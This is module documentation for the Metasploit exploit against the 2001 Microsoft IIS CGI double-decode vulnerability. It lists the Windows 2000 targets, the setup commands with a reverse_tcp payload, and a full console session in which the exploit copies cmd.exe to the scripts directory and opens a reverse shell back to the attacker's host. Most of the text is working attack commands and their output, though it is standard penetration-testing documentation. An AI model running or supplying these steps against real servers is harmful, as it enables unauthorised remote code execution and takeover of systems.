Vulnerable Application
This module will execute an arbitrary payload on a Microsoft IIS installation that is vulnerable to the CGI double-decode vulnerability of 2001.
This module has been tested successfully on:
Windows 2000 Professional (SP0) (EN)
Windows 2000 Professional (SP1) (AR)
Windows 2000 Professional (SP1) (CZ)
Windows 2000 Server (SP0) (FR)
Windows 2000 Server (SP1) (EN)
Windows 2000 Server (SP1) (SE)
Note: This module will leave a Metasploit payload in the IIS scripts directory.
Verification Steps
use exploit/windows/iis/ms01_026_dbldecode
set RHOSTS [IP]
set PAYLOAD windows/shell/reverse_tcp
set LHOST [IP]
run
Options
WINDIR
The Windows directory name of the target host. The directory name will be detected automatically if not set.
DEPTH
Traversal depth to reach the drive root (default: 2)
Scenarios
Windows 2000 Server (SP0) (FR)
msf > use exploit/windows/iis/ms01_026_dbldecode
[*] Using configured payload windows/shell/reverse_tcp
msf exploit(windows/iis/ms01_026_dbldecode) > set rhosts 192.168.200.175
rhosts => 192.168.200.175
msf exploit(windows/iis/ms01_026_dbldecode) > check
[+] 192.168.200.175:80 - The target is vulnerable. Found Windows directory name: winnt
msf exploit(windows/iis/ms01_026_dbldecode) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf exploit(windows/iis/ms01_026_dbldecode) > run
[*] Started reverse TCP handler on 192.168.200.130:4444
[*] Using Windows directory "winnt"
[*] Copying "\winnt\system32\cmd.exe" to the IIS scripts directory as "EcFJ.exe"...
[*] Command Stager progress - 66.67% done (40/60 bytes)
[*] Command Stager progress - 100.00% done (60/60 bytes)
[*] Triggering payload "qQErEZeB.exe" via a direct request...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.200.175
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.175:1090) at 2022-06-28 08:34:32 -0400
[!] This exploit may require manual cleanup of 'qQErEZeB.exe' on the target
Shell Banner:
c:\inetpub\scripts>hostname
hostname
win2k-srv-fr
